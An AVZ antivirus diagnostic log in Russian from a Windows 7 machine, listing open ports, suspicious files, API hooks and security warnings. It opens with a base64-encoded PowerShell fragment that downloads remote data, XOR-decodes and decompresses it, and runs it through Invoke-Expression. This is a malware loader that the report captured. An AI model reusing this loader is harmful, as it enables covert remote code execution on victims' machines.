tAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA64
Обнаружено элементов - 81, опознано как безопасные - 54

Настройки SPI/LSP

Поставщики пространства имен (NSP)
ПоставщикСтатусИсп. файлОписаниеGUID
Обнаружено - 6, опознано как безопасные - 6
Поставщики транспортных протоколов (TSP, LSP)
ПоставщикИсп. файлОписание
Обнаружено - 10, опознано как безопасные - 10
Результаты автоматического анализа настроек SPI
Настройки LSP проверены. Ошибок не обнаружено

Порты TCP/UDP

ПортСтатусRemote HostRemote PortПриложениеПримечания
Порты TCP
139LISTENING0.0.0.00System.exe [4]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
445LISTENING0.0.0.00System.exe [4]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
2869LISTENING0.0.0.00System.exe [4]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
5555LISTENING0.0.0.00c:\program files (x86)\media saver\basement\mslserver.exe [3016]
172.01 кб, rsAh, создан: 13.01.2015 17:40:48, изменен: 13.01.2015 17:40:48
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
26143LISTENING0.0.0.00System.exe [4]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49155LISTENING0.0.0.00lsass.exe [568]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49156LISTENING0.0.0.00services.exe [560]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49157LISTENING0.0.0.00alg.exe [2668]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49161TIME_WAIT91.203.99.18443  [0]
ошибка получения информации о файле
 
49165ESTABLISHED127.0.0.149166c:\program files (x86)\common files\baidu\baiduprotect1.3\1.3.0.602\baiduprotect.exe [736]
1878.60 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49166ESTABLISHED127.0.0.149165c:\program files (x86)\common files\baidu\baiduprotect1.3\1.3.0.602\baiduprotect.exe [736]
1878.60 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49168TIME_WAIT91.203.99.2380  [0]
ошибка получения информации о файле
 
49171TIME_WAIT77.88.55.5580  [0]
ошибка получения информации о файле
 
49226TIME_WAIT87.250.250.210443  [0]
ошибка получения информации о файле
 
49228ESTABLISHED87.250.250.210443c:\progra~2\opera\36.0.2130.46\opera.exe [2880]
633.04 кб, rsAh, создан: 05.04.2016 16:36:21, изменен: 05.04.2016 16:36:14
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
49229TIME_WAIT40.127.129.109443  [0]
ошибка получения информации о файле
 
49231ESTABLISHED74.125.205.113443c:\progra~2\opera\36.0.2130.46\opera.exe [2880]
633.04 кб, rsAh, создан: 05.04.2016 16:36:21, изменен: 05.04.2016 16:36:14
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
Порты UDP
137LISTENING----System.exe [4]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 
138LISTENING----System.exe [4]
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
 

Downloaded Program Files (DPF)

Имя файлаОписаниеПроизводительCLSIDURL загрузки
Обнаружено элементов - 0, опознано как безопасные - 0

Апплеты панели управления (CPL)

Имя файлаОписаниеПроизводитель
C:\Windows\system32\FlashPlayerCPLApp.cpl
139.19 кб, rsAh, создан: 10.01.2014 21:40:51, изменен: 10.04.2016 18:36:37
Скрипт: Kарантин, Удалить, Удалить через BC
Adobe Flash Player Control Panel AppletCopyright © 1996-2016 Adobe Systems Incorporated. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries.
Обнаружено элементов - 19, опознано как безопасные - 18

Active Setup

Имя файлаОписаниеПроизводительCLSID
Обнаружено элементов - 0, опознано как безопасные - 0

Файл HOSTS

Запись файла Hosts
127.0.0.1       localhost
Очистка файла Hosts

Протоколы и обработчики

Имя файлаТипОписаниеПроизводительCLSID
Обнаружено элементов - 18, опознано как безопасные - 18

Общие ресурсы

Сетевое имяПутьПримечания
ADMIN$C:\WindowsУдаленный Admin
C$C:\Стандартный общий ресурс
D$D:\Стандартный общий ресурс
E$E:\Стандартный общий ресурс
IPC$Удаленный IPC

Подозрительные объекты

ФайлОписаниеТип
C:\Windows\system32\ir16_32.dll
329.53 кб, rsAh, создан: 02.01.2014 00:48:42, изменен: 02.08.2013 07:50:41
Скрипт: Kарантин, Удалить, Удалить через BC
Подозрение эвристического анализа ЭПС: подозрение на Файл с подозрительным именем (CH) (высокая степень вероятности)
C:\Users\Владислав\appdata\local\microsoft\internet explorer\extensions\apihelper.dll
237.00 кб, rsAh, создан: 19.01.2015 14:13:58, изменен: 06.03.2015 11:13:44, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
Подозрение эвристического анализа ЭПС: подозрение на Файл с подозрительным именем (CH)
C:\Users\Владислав\appdata\local\microsoft\start menu\вoйти в интeрнeт.exe
53.36 кб, rSAH, создан: 07.04.2015 17:03:44, изменен: 07.04.2015 17:05:09, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
Подозрение эвристического анализа ЭПС: подозрение на Файл с подозрительным именем (CH)
C:\Users\Владислав\appdata\roaming\daemon2.exe
166.67 кб, rsAh, создан: 18.01.2016 20:33:56, изменен: 18.01.2016 20:33:56, имя содержит национальные символы
Скрипт: Kарантин, Удалить, Удалить через BC
Подозрение эвристического анализа ЭПС: подозрение на Файл с подозрительным именем (CH)


Протокол антивирусной утилиты AVZ версии 4.46
Сканирование запущено в 14.04.2016 11:33:35
Загружена база: сигнатуры - 297569, нейропрофили - 2, микропрограммы лечения - 56, база от 14.04.2016 04:00
Загружены микропрограммы эвристики: 408
Загружены микропрограммы ИПУ: 10
Загружены цифровые подписи системных файлов: 794873
Режим эвристического анализатора: Средний уровень эвристики
Режим лечения: выключено
Версия Windows: 6.1.7601, Service Pack 1 "Windows 7 Ultimate", дата инсталляции 27.12.2013 20:31:57 ; AVZ работает с правами администратора (+)
Восстановление системы: включено
1. Поиск RootKit и программ, перехватывающих функции API
1.1 Поиск перехватчиков API, работающих в UserMode
 Анализ kernel32.dll, таблица экспорта найдена в секции .text
 Анализ ntdll.dll, таблица экспорта найдена в секции .text
Функция ntdll.dll:NtDeviceIoControlFile (287) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:NtSuspendProcess (547) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:NtSuspendThread (548) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:NtWriteFile (596) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:ZwDeviceIoControlFile (1538) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:ZwSuspendProcess (1797) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:ZwSuspendThread (1798) перехвачена, метод CodeHijack (метод не определен)
Функция ntdll.dll:ZwWriteFile (1846) перехвачена, метод CodeHijack (метод не определен)
 Анализ user32.dll, таблица экспорта найдена в секции .text
Функция user32.dll:DestroyWindow (1675) перехвачена, метод CodeHijack (метод не определен)
Функция user32.dll:SetParent (2191) перехвачена, метод CodeHijack (метод не определен)
Функция user32.dll:SetWindowPlacement (2222) перехвачена, метод CodeHijack (метод не определен)
Функция user32.dll:ShowWindow (2248) перехвачена, метод CodeHijack (метод не определен)
Функция user32.dll:ShowWindowAsync (2249) перехвачена, метод CodeHijack (метод не определен)
 Анализ advapi32.dll, таблица экспорта найдена в секции .text
 Анализ ws2_32.dll, таблица экспорта найдена в секции .text
 Анализ wininet.dll, таблица экспорта найдена в секции .text
 Анализ rasapi32.dll, таблица экспорта найдена в секции .text
 Анализ urlmon.dll, таблица экспорта найдена в секции .text
 Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.4 Поиск маскировки процессов и драйверов
 Проверка не производится, так как не установлен драйвер мониторинга AVZPM
2. Проверка памяти
 Количество найденных процессов: 18
 Количество загруженных модулей: 195
Проверка памяти завершена
3. Сканирование дисков
Прямое чтение C:\Users\Владислав\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.tmp
Прямое чтение C:\Users\Владислав\AppData\Local\Temp\~DF001F44AFF2D5E595.TMP
Прямое чтение C:\Users\Владислав\AppData\Local\Temp\~DF3DF51919A30A410D.TMP
Прямое чтение C:\Users\Владислав\AppData\Local\Temp\~DF50F7274B4DDD0552.TMP
Прямое чтение C:\Users\Владислав\AppData\Local\Temp\~DF56131A1B416544AA.TMP
4. Проверка Winsock Layered Service Provider (SPI/LSP)
 Настройки LSP проверены. Ошибок не обнаружено
5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
 Проверка отключена пользователем
7. Эвристичеcкая проверка системы
>>> C:\Windows\system32\ir16_32.dll ЭПС: подозрение на Файл с подозрительным именем (CH) (высокая степень вероятности)
>>> C:\Users\Владислав\appdata\local\microsoft\internet explorer\extensions\apihelper.dll ЭПС: подозрение на Файл с подозрительным именем (CH)
>>> C:\Users\Владислав\appdata\local\microsoft\start menu\вoйти в интeрнeт.exe ЭПС: подозрение на Файл с подозрительным именем (CH)
>>> C:\Users\Владислав\appdata\roaming\daemon2.exe ЭПС: подозрение на Файл с подозрительным именем (CH)
Проверка завершена
8. Поиск потенциальных уязвимостей
>> Службы: разрешена потенциально опасная служба TermService (Службы удаленных рабочих столов)
>> Службы: разрешена потенциально опасная служба SSDPSRV (Обнаружение SSDP)
>> Службы: разрешена потенциально опасная служба Schedule (Планировщик заданий)
> Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)!
>> Безопасность: разрешен автозапуск программ с CDROM
>> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...)
>> Безопасность: к ПК разрешен доступ анонимного пользователя
>> Безопасность: Разрешена отправка приглашений удаленному помощнику
>> Проводник - включить отображение расширений для файлов известных системе типов
Проверка завершена
9. Мастер поиска и устранения проблем
 >>  Разрешен автозапуск с HDD
 >>  Разрешен автозапуск с сетевых дисков
 >>  Разрешен автозапуск со сменных носителей
Проверка завершена
Просканировано файлов: 106014, извлечено из архивов: 73113, найдено вредоносных программ 0, подозрений - 0
Сканирование завершено в 14.04.2016 11:41:12
Сканирование длилось 00:07:37
Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
то Вы можете обратиться на форум http://forum.kaspersky.com/index.php?showforum=18
Для автоматической проверки файлов, не опознаных как чистые или заподозренных AVZ 
можно использовать сервис http://virusdetector.ru/
Выполняется исследование системы
Диагностика сети
 DNS and Ping test
  Host="yandex.ru", IP="77.88.55.66,77.88.55.55,5.255.255.55,5.255.255.5", Ping=OK (0,63,77.88.55.66)
  Host="google.ru", IP="173.194.222.94", Ping=OK (0,81,173.194.222.94)
  Host="google.com", IP="173.194.222.139,173.194.222.138,173.194.222.100,173.194.222.101,173.194.222.113,173.194.222.102", Ping=OK (0,81,173.194.222.139)
  Host="www.kaspersky.com", IP="77.74.178.16", Ping=OK (0,55,77.74.178.16)
  Host="www.kaspersky.ru", IP="77.74.178.20", Ping=OK (0,54,77.74.178.20)
  Host="dnl-03.geo.kaspersky.com", IP="95.167.139.6", Ping=OK (0,56,95.167.139.6)
  Host="dnl-11.geo.kaspersky.com", IP="62.128.100.81", Ping=OK (0,53,62.128.100.81)
  Host="activation-v2.kaspersky.com", IP="212.5.89.37", Ping=OK (0,55,212.5.89.37)
  Host="odnoklassniki.ru", IP="217.20.155.58,5.61.23.5,217.20.156.159", Ping=OK (0,54,217.20.155.58)
  Host="vk.com", IP="87.240.131.119,87.240.131.117,87.240.131.118", Ping=OK (0,71,87.240.131.119)
  Host="vkontakte.ru", IP="95.213.4.246,95.213.4.247,95.213.4.245", Ping=OK (0,72,95.213.4.246)
  Host="twitter.com", IP="199.16.156.6,199.16.156.230,199.16.156.198,199.16.156.70", Ping=OK (0,210,199.16.156.6)
  Host="facebook.com", IP="31.13.76.68", Ping=OK (0,242,31.13.76.68)
  Host="ru-ru.facebook.com", IP="66.220.158.19", Ping=OK (0,201,66.220.158.19)
 Network IE settings
  IE setting AutoConfigURL=
  IE setting AutoConfigProxy=wininet.dll
  IE setting ProxyOverride=
  IE setting ProxyServer=
  IE setting Internet\ManualProxies=
 Network TCP/IP settings
  Interface: "Подключение по локальной сети"
   IPAddress = "192.168.1.55"
   SubnetMask = "255.255.255.0"
   DefaultGateway = "192.168.1.1"
   NameServer = "195.38.33.2,195.38.32.3"
   Domain = ""
   DhcpServer = "255.255.255.255"
 Network Persistent Routes
  Route 0.0.0.0,0.0.0.0,192.168.1.1,-1

Исследование системы завершено
Команды скрипта
Добавить в скрипт команды:
Дополнительные операции:
Список файлов